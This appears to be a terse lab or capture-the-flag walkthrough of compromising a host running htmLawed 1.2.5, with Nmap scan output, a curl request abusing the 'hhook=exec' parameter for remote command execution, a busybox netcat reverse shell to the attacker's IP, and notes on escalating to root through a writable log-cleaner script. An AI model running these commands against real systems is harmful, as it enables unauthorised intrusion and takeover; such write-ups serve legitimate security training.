Date
Mar 26, 2025 → Mar 26, 2025
Tag
Nmap
Web Exploitation
Privilege Escalation Techniques
192.168.108.190
Nmap
└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 01:46 EDT
Nmap scan report for 192.168.108.190
Host is up (0.059s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 14.62 seconds
└─# nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 01:46 EDT
Warning: 192.168.108.190 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.108.190
Host is up (0.066s latency).
All 65535 scanned ports on 192.168.108.190 are in ignored states.
Not shown: 65386 open|filtered udp ports (no-response), 149 closed udp ports (port-unreach)
Nmap done: 1 IP address (1 host up) scanned in 145.48 seconds
└─# nmap -Pn -n $ip -sC -sV -p- --open -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 01:48 EDT
Nmap scan report for 192.168.108.190
Host is up (0.056s latency).
Not shown: 65466 closed tcp ports (reset), 67 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
| 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_ 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: htmLawed (1.2.5) test
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.49 seconds
22

nothing found
80


Change the curl command to our IP and command
curl -s -d "sid=foo&hhook=exec&text=whoami" -b "sid=foo" http://192.168.108.190/

busybox nc 192.168.45.160 4444 -e /bin/bash

got in
PE
move linpeas.sh to target machine

we found that have a script to clean something let’s take a look

so it is a log cleaner

we also dont have permission to look at the logs file, so i guess it is a root excute script, since this script is added by current user, let try added some PE command into it

after added it in, we got the root permission